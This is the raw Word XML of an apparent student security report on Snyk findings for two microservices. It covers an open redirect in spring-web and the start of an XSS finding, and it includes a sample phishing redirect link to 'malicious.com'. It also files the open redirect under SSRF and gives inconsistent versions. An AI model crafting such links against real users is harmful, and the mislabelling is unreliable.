              <w:instrText xml:space="preserve"> PAGEREF _Toc168573802 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D4B59B8" w14:textId="1A7F979F" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573803" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573803 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EBD8F55" w14:textId="0CB753B7" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573804" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Immediate Actions:</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573804 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69307F27" w14:textId="2FCC68B6" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573805" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Post-Semester Actions:</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573805 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="048ADBC1" w14:textId="72239C06" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573806" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573806 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="040764AB" w14:textId="5E1D33C2" w:rsidR="001C5827" w:rsidRDefault="001C5827">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6B23DF6F" w14:textId="5A3F88AE" w:rsidR="001C5827" w:rsidRDefault="001C5827">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="789FBCE6" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00572BDB"/>
    <w:p w14:paraId="49A0EC19" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc168573788"/>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1820432E" w14:textId="7C612A47" w:rsidR="00B705E0" w:rsidRDefault="00B705E0">
      <w:r>
        <w:t xml:space="preserve">This report is conducted based on the results of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Snyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scans and analysis in my two GitHub repositories. It is </w:t>
      </w:r>
      <w:r w:rsidR="008A42C2">
        <w:t>best</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to work on the vulnerability findings as soon as possible to prevent any security risks. </w:t>
      </w:r>
      <w:r w:rsidR="008A42C2">
        <w:t>Because of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> time constrains and the current stage of the project</w:t>
      </w:r>
      <w:r w:rsidR="008A42C2">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>some vulnerabilities related to JDK and Docker image dependencies will not be addressed immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3F9DAF" w14:textId="2EE26004" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc168573789"/>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="47ED3C96" w14:textId="77777777" w:rsidR="00D97626" w:rsidRDefault="00B705E0">
      <w:r>
        <w:t>This is a report of the analysis of the security vulnerabilities, that have been detected in my Maven dependencies and Docker images of the two microservices. The idea is to identify and put a priority on the vulnerabilities that could be a future security risk, and to recommend prevention strategies.</w:t>
      </w:r>
      <w:r w:rsidR="00D97626">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DB4A4E" w14:textId="5A5C1E19" w:rsidR="00B705E0" w:rsidRPr="00D97626" w:rsidRDefault="00D97626">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">N.B. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D97626">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The screenshots of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D97626">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Snyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D97626">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> analysis </w:t>
      </w:r>
      <w:r w:rsidR="00653AF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidRPr="00D97626">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> uploaded to the evidence folder in my Portfolio tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E5E645" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc168573790"/>
      <w:r>
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="32BFED5D" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc168573791"/>
      <w:r>
        <w:t xml:space="preserve">Project: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>movimingle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-favorites-management-service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="39190858" w14:textId="548D1EEF" w:rsidR="001C5827" w:rsidRDefault="00000000" w:rsidP="009F0D41">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc168573792"/>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="009F0D41" w:rsidRPr="009F0D41">
        <w:t>Open Redirect Vulnerability in Spring Web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="7EF2F0D6" w14:textId="3E6B6546" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Open Redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E3103" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>File: pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B0FE4" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Affected Library: Spring Web (spring-web)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D6276" w14:textId="4AD585F4" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Introduced Through: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>org.springframework</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:spring-web@</w:t>
      </w:r>
      <w:r w:rsidR="009F0D41">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F0D41">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E573165" w14:textId="58E6863B" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Fixed in Version: 5.3.</w:t>
      </w:r>
      <w:r w:rsidR="009F0D41">
        <w:t>34</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2158"/>
        <w:gridCol w:w="2157"/>
        <w:gridCol w:w="2156"/>
        <w:gridCol w:w="2159"/>
      </w:tblGrid>
      <w:tr w:rsidR="00572BDB" w14:paraId="6BD53C3B" w14:textId="77777777" w:rsidTr="001C5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20EB215" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58D2808E" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E9AB8E1" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30B35BCB" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00572BDB" w14:paraId="77AD355E" w14:textId="77777777" w:rsidTr="001C5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E749A31" w14:textId="24D2929A" w:rsidR="00572BDB" w:rsidRDefault="009F0D41">
            <w:r w:rsidRPr="009F0D41">
              <w:t>The vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="007C3F4F">
              <w:t xml:space="preserve"> occurs because of</w:t>
            </w:r>
            <w:r w:rsidRPr="009F0D41">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008A42C2">
              <w:t xml:space="preserve">a lack </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="008A42C2">
              <w:t xml:space="preserve">of </w:t>
            </w:r>
            <w:r w:rsidRPr="009F0D41">
              <w:t xml:space="preserve"> validation</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F0D41">
              <w:t xml:space="preserve"> of redirect URLs, which could be exploited to redirect users to </w:t>
            </w:r>
            <w:r w:rsidRPr="009F0D41">
              <w:lastRenderedPageBreak/>
              <w:t>malicious websites.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A4C4643" w14:textId="65EF6520" w:rsidR="00572BDB" w:rsidRDefault="009F0D41">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009F0D41">
              <w:lastRenderedPageBreak/>
              <w:t>Medium risk of phishing attacks leading to potential information theft</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B302094" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A10:2021 - Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="705E95FE" w14:textId="6D7DB2CA" w:rsidR="00572BDB" w:rsidRDefault="009F0D41">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="009F0D41">
              <w:t xml:space="preserve">Update to the specified fixed versions. Implement </w:t>
            </w:r>
            <w:r w:rsidR="007C3F4F">
              <w:t>strong</w:t>
            </w:r>
            <w:r w:rsidRPr="009F0D41">
              <w:t xml:space="preserve"> validation checks for all URL parameters to prevent unauthorized redirects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="621D3233" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="00CA7D46"/>
    <w:p w14:paraId="02ACA121" w14:textId="5D717623" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="00CA7D46">
      <w:r w:rsidRPr="00CA7D46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7D46">
        <w:t xml:space="preserve">: A feature in the application redirects users to a URL specified in the </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7D46">
        <w:t>redirect</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7D46">
        <w:t xml:space="preserve"> query parameter. An attacker crafts a link with the malicious URL </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7D46">
        <w:t>http://example.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA7D46">
        <w:t>login?redirect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA7D46">
        <w:t>=http://malicious.com</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA7D46">
        <w:t xml:space="preserve"> that appears legitimate but redirects the victim to a phishing site after logging in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE509C9" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="00CA7D46"/>
    <w:p w14:paraId="7AE9225C" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="00CA7D46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc168573793"/>
      <w:r>
        <w:t>2. Cross-Site Scripting (XSS) Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5CD80A5F" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="00CA7D46">
      <w:r>
        <w:t>File: ‘SendMessageController.java’</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2157"/>
        <w:gridCol w:w="2156"/>
        <w:gridCol w:w="2157"/>
        <w:gridCol w:w="2160"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CA7D46" w14:paraId="21020B66" w14:textId="77777777" w:rsidTr="0027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712CE87" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="0027424F">
            <w:r>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="578A0016" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="0027424F">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64322D2C" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="0027424F">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>OWASP Top 10 Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73FBE160" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="0027424F">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA7D46" w14:paraId="55DB0CB6" w14:textId="77777777" w:rsidTr="0027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67C14B4" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="0027424F">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Unsanitized</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> input from an HTTP parameter is directly used in generating HTML output, leading to XSS.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="413336A0" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="0027424F">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64C36DEA" w14:textId="77777777" w:rsidR="00CA7D46" w:rsidRDefault="00CA7D46" w:rsidP="0027424F">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A03:2021 - Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
